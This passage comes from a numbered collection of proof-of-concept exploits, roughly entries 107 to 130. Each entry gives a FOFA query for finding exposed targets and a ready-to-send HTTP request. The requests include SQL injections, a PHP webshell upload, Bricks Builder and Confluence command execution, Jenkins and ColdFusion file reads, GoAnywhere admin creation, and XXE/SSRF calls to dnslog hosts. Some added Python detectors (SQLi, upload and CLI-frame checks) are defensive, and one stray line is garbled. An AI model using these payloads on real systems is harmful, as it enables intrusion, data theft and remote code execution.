GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

The Blade-Auth token above is the one shipped with the published POC (an admin token signed with the framework's default secret); it is accepted only where that default was never changed. The MySQL version string appears in the error response when the injection works.

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

The server fetches the url parameter itself to load the CSV, so the dnslog host records the request.

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
The CLI over HTTP uses two POSTs to /cli?remoting=false that share a Session id: one with Side: upload carrying the framed command and one with Side: download receiving the output. The upload body is shown below as a Python bytes literal; send the raw bytes and set Content-Length to their actual length.
POST /cli?remoting=false HTTP/1.1
Host:
Content-Type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

The help command takes a single argument; "@/etc/passwd" makes the args4j parser expand the file's lines into arguments, and those lines come back in the error text of the download response:
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
 [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

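The bytes literal above is the Jenkins plain CLI framing, which the POC author pasted without explanation. As an added example (mine, not from the published POC or from Jenkins), the Python below builds that exact byte sequence from the arguments, parses it back, and picks out the arguments args4j would expand from a file, which is the check a proxy or IDS rule needs. Each frame is a 4-byte big-endian length of the chunk, one opcode byte (0 ARG, 1 LOCALE, 2 ENCODING, 3 START, the order the upload body itself shows) and, for the string opcodes, a Java writeUTF value (2-byte length plus UTF-8 bytes). Function names are mine; the sample body is the one published above.

```python
import struct

# Opcodes of the Jenkins plain CLI protocol, in enum-ordinal order.
OP_ARG, OP_LOCALE, OP_ENCODING, OP_START = 0, 1, 2, 3


def _java_utf(text):
    """Java DataOutputStream.writeUTF framing: 2-byte big-endian length + bytes."""
    data = text.encode("utf-8")
    return struct.pack(">H", len(data)) + data


def _frame(op, chunk=b""):
    """4-byte big-endian chunk length (the opcode byte is not counted), opcode, chunk."""
    return struct.pack(">I", len(chunk)) + bytes([op]) + chunk


def encode_cli_upload(args, encoding="UTF-8", locale="en_US"):
    """Body of the Side: upload request for the given CLI arguments."""
    body = b"".join(_frame(OP_ARG, _java_utf(arg)) for arg in args)
    body += _frame(OP_ENCODING, _java_utf(encoding))
    body += _frame(OP_LOCALE, _java_utf(locale))
    body += _frame(OP_START)
    return body


def parse_cli_upload(data):
    """Inverse of encode_cli_upload: list of (opcode, text-or-None) frames."""
    frames = []
    pos = 0
    while pos + 5 <= len(data):
        (length,) = struct.unpack_from(">I", data, pos)
        op = data[pos + 4]
        chunk = data[pos + 5:pos + 5 + length]
        if len(chunk) != length:
            raise ValueError("truncated frame at offset %d" % pos)
        if op in (OP_ARG, OP_LOCALE, OP_ENCODING):
            (n,) = struct.unpack_from(">H", chunk, 0)
            text = chunk[2:2 + n].decode("utf-8")
        else:
            text = None
        frames.append((op, text))
        pos += 5 + length
    if pos != len(data):
        raise ValueError("trailing bytes after last frame")
    return frames


def file_expansion_args(data):
    """Arguments args4j would replace with the contents of a file (the CVE-2024-23897 sink)."""
    return [text for op, text in parse_cli_upload(data) if op == OP_ARG and text.startswith("@")]


# The upload body published above, as raw bytes.
SAMPLE_UPLOAD_BODY = (
    b"\x00\x00\x00\x06\x00\x00\x04help"
    b"\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd"
    b"\x00\x00\x00\x05\x02\x00\x03GBK"
    b"\x00\x00\x00\x07\x01\x00\x05en_US"
    b"\x00\x00\x00\x00\x03"
)

if __name__ == "__main__":
    print(parse_cli_upload(SAMPLE_UPLOAD_BODY))
    print(file_expansion_args(SAMPLE_UPLOAD_BODY))
```

Note that the published body is 57 bytes, not the 163 in its Content-Length header; encode_cli_upload gives the length to send. Any ARG frame beginning with "@" from an unauthenticated source is the signature to alert on, whatever command precedes it.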
110. GoAnywhere MFT unauthenticated admin creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If the initial account setup wizard renders, the "..;/" segment has bypassed the path check that normally hides it after installation, and a new administrator can be created through the form.

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Time-based blind injection in the id parameter: a response delayed by about 6 seconds confirms it.

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

The type value is interpolated into a column name (hence the backtick); a 5-second delay confirms the injection.

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The link parameter is fetched server-side without a scheme restriction: file:// reads local files, http:// turns it into an SSRF.

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

Time-based blind injection in the user parameter of the REST route; a 5-second delay confirms it.

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: fetch the front page and take the nonce from it (the theme's front-end script embeds a REST nonce in the page source; search the response for "nonce").
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: put that nonce into the request below and execute the command. The queryEditor string is evaluated as PHP by the render endpoint; the output is captured and thrown as an exception so it appears in the response.
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket plugin file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

The published POC is a nuclei-style template ({{rand8}} is a random 8-character name) and leaves the file part empty; the file content goes between the Content-Type line's blank line and the closing boundary. The image/png Content-Type is what the plugin checks, not the .php extension.

117. WordPress LayerSlider plugin SQL injection
Affected versions: 7.9.11 to 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
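
The SQL injections in entries 105 to 107 and 111 to 117 share three shapes: an updatexml()/SLEEP() expression used as a query parameter name (SpringBlade), a SLEEP() payload in a query value (the WordPress GET requests), and a payload inside a JSON string (NotificationX). As an added example, not part of the published POCs, the Python below scans a request target and body for those indicators and reports where each was found; checking parameter names as well as values is the point, because a value-only rule never sees the SpringBlade variant. Function and sample names are mine; the samples are the request lines and body published above, plus one constructed benign query.

```python
import json
import re
from urllib.parse import parse_qsl, urlsplit

SQLI_RE = re.compile(
    r"\b(?:updatexml|extractvalue)\s*\("            # error-based (entries 105-107)
    r"|\bsleep\s*\(\s*\d+"                          # time-based MySQL (entries 111-117)
    r"|\b(?:benchmark\s*\(|pg_sleep\s*\(|waitfor\s+delay)"
    r"|(?:'|`|\))\s*(?:and|or)\b",                   # closing a quote/paren, then a boolean operator
    re.I,
)


def _check(location, text):
    return [(location, text)] if SQLI_RE.search(text) else []


def _json_strings(obj):
    """Every string (keys included) anywhere in a decoded JSON document."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            yield from _json_strings(key)
            yield from _json_strings(value)
    elif isinstance(obj, list):
        for value in obj:
            yield from _json_strings(value)
    elif isinstance(obj, str):
        yield obj


def sqli_indicators(target, body="", content_type=""):
    """(location, text) for each request field matching SQLI_RE.

    Query-string and form *names* are checked as well as values: the SpringBlade list
    endpoints turn the parameter name into a column expression, so the payload never
    appears in a value.
    """
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        hits += _check("query-name", name) + _check("query-value", value)
    if "json" in content_type.lower():
        try:
            document = json.loads(body)
        except ValueError:
            document = None
        for text in _json_strings(document):
            hits += _check("json", text)
    elif body:
        for name, value in parse_qsl(body, keep_blank_values=True):
            hits += _check("form-name", name) + _check("form-value", value)
    return hits


# Request targets and body as published above; the last one is a constructed benign query.
SAMPLE_SPRINGBLADE = "/api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1"
SAMPLE_H5VP = "/?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-"
SAMPLE_LAYERSLIDER = ("/wp-admin/admin-ajax.php?action=ls_get_popup_markup"
                      "&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq")
SAMPLE_NOTIFICATIONX_BODY = '{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}'
SAMPLE_BENIGN = "/api/blade-system/dict-biz/list?current=1&size=10&code=sex"

if __name__ == "__main__":
    for target in (SAMPLE_SPRINGBLADE, SAMPLE_H5VP, SAMPLE_LAYERSLIDER, SAMPLE_BENIGN):
        print(target, sqli_indicators(target))
    print(sqli_indicators("/wp-json/notificationx/v1/analytics",
                          SAMPLE_NOTIFICATIONX_BODY, "application/json"))
```

The regex is an indicator, not a proof: confirm a hit the way the POCs do, by the response delay for SLEEP() payloads or the version string in the error body for updatexml().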

118. Beijing 百绰 Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

The txt_path field chooses where the uploaded file is written. Then access /home/src.php and send the command in the passwd POST parameter.
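
The upload entries on this page (94, 100, 116, 118 and the ones that follow) all come down to a handler that trusts the client's filename, Content-Type or destination field. As an added example, mine rather than the published POC's or the vendor's code, the Python below is a small multipart/form-data parser and the three checks a handler or an inline filter should apply to each part: an executable extension, a PHP open tag in the file body regardless of extension, and a non-file field that names a filesystem path (the txt_path destination above). Function names are mine; the sample body is the S210 request above reassembled with CRLF line endings, plus one constructed benign PNG upload.

```python
import re

PHP_EXT_RE = re.compile(r"\.(?:php\d?|phtml|phar)$", re.I)
PHP_TAG_RE = re.compile(rb"<\?(?:php\b|=)", re.I)


def _disposition_param(header, key):
    # "name" must not match inside "filename", hence the separator before the key.
    match = re.search(r'(?:^|[;\s])%s\s*=\s*"([^"]*)"' % key, header)
    return match.group(1) if match else None


def parse_multipart(body, boundary):
    """Minimal multipart/form-data parser (RFC 7578 framing, CRLF or LF line ends).
    Returns dicts with name, filename, content_type and the raw data bytes."""
    delimiter = b"--" + boundary.encode()
    parts = []
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):            # closing delimiter "--boundary--"
            break
        chunk = chunk[2:] if chunk.startswith(b"\r\n") else chunk.lstrip(b"\n")
        head, sep, data = chunk.partition(b"\r\n\r\n")
        if not sep:
            head, _, data = chunk.partition(b"\n\n")
        data = data[:-2] if data.endswith(b"\r\n") else data.rstrip(b"\n")
        headers = {}
        for line in head.decode("utf-8", "replace").splitlines():
            key, _, value = line.partition(":")
            headers[key.strip().lower()] = value.strip()
        disposition = headers.get("content-disposition", "")
        parts.append({
            "name": _disposition_param(disposition, "name"),
            "filename": _disposition_param(disposition, "filename"),
            "content_type": headers.get("content-type"),
            "data": data,
        })
    return parts


def upload_findings(body, boundary):
    """(kind, field, value) triples for what an upload handler must refuse."""
    findings = []
    for part in parse_multipart(body, boundary):
        name, filename, data = part["name"], part["filename"], part["data"]
        if filename is not None:
            if PHP_EXT_RE.search(filename):
                findings.append(("php-extension", name, filename))
            if PHP_TAG_RE.search(data):
                findings.append(("php-tag-in-file", name, filename))
        else:
            value = data.decode("utf-8", "replace")
            if value.startswith("/") or "../" in value or PHP_EXT_RE.search(value):
                findings.append(("path-like-field", name, value))
    return findings


# The S210 request body from above, reassembled with CRLF line endings.
SAMPLE_BOUNDARY = "---------------------------13979701222747646634037182887"
SAMPLE_BODY = b"\r\n".join([
    b"--" + SAMPLE_BOUNDARY.encode(),
    b'Content-Disposition: form-data; name="file_upload"; filename="contents.php"',
    b"Content-Type: application/octet-stream",
    b"",
    b"<?php",
    b'system($_POST["passwd"]);',
    b"?>",
    b"--" + SAMPLE_BOUNDARY.encode(),
    b'Content-Disposition: form-data; name="txt_path"',
    b"",
    b"/home/src.php",
    b"--" + SAMPLE_BOUNDARY.encode() + b"--",
    b"",
])
# Constructed benign upload: a PNG header under an image name, no path field.
SAMPLE_BENIGN_BODY = b"\r\n".join([
    b"--" + SAMPLE_BOUNDARY.encode(),
    b'Content-Disposition: form-data; name="file_upload"; filename="logo.png"',
    b"Content-Type: image/png",
    b"",
    b"\x89PNG\r\n\x1a\n",
    b"--" + SAMPLE_BOUNDARY.encode() + b"--",
    b"",
])

if __name__ == "__main__":
    print(upload_findings(SAMPLE_BODY, SAMPLE_BOUNDARY))
    print(upload_findings(SAMPLE_BENIGN_BODY, SAMPLE_BOUNDARY))
```

The PHP-tag check is what catches entry 116's trick of sending a .php file under an image/png Content-Type, and the path-field check is the one that matters for S210, where the extension of the uploaded file is irrelevant because the client names the destination.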
" @' p+ y) u. I; z5 t
119. Beijing 百绰 Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

Time-based blind injection in the id field: the response is delayed by 5 seconds when the database name is 3 characters long.

120. Beijing 百绰 Smart S40 management platform web.php import arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--

Uploaded file path: /upload/2.php

121. Beijing 百绰 Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328--

Uploaded file path: boot/web/upload/weblogo/1.php

122. 北京百绰智能 S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. 湖南建研 engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin console directly; system commands can then be executed.

126. aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. 广联达 Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
